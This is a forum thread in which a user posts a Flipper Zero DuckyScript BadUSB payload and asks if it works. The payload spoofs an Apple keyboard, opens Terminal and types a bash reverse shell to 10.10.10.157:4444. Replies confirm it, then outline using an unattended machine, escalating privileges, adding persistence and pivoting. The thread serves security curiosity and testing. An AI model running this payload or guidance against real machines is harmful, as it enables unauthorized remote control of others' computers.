DuckyScript backdoors

BadUSB
#1

Recently, I saw a post about a person who uses the Flipper to test for potential weaknesses in their workplace. They basically posted a tutorial on how to make a reverse shell on a macOS running Linux. The code was fairly simple and didn’t seem real. You can see the code here, but can someone debunk this? I will also link the post for instructions. I can’t try it just yet, since my Flipper is currently arriving in the mail.

/* Flipper Zero ducky commands for *
*backdoor exploits in macOS *
using reverse shells */

ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 200
ENTER
DELAY 1000
STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
DELAY 1000
ENTER
DELAY 1000

/* Replace text on “STRINGbash” lower command with I.P. for mac (10.10.10.157) and replace upper command with port (4444) */

The original post can be viewed here
Or, if you don’t trust hyperlinks, here ---------> How to Get a Reverse Shell on macOS Using A Flipper Zero as a BadUSB | HackerNoon

1 Like
#2

It looks legit to me. There is a local IP to receive the shell.

#3

Alright. What do you think this has access to on the victim’s computer?

#4

It could potentially do anything you can imagine if it was ran with root privilege or there was a flaw that let you escalate privileges. Make changes, execute code, erase everything, or add new users. Basically you would find an open terminal or unlocked Linux machine and run the script. After that you unplug the Flipper. Then you could run bash commands from another machine which is great if you only had a few seconds on the main machine because someone walked away for coffee. At that point you have time to do things like escalate privileges and add persistent access.

I would say the person that wrote the tutorial would do those types of things to test whether automatic detection tools were working properly and if security was responding to detection properly.

EDIT: I almost forgot. They would almost certainly see what access the target machine had to the rest of the network so they could try to “pivot” to other machines. That’s pretty standard.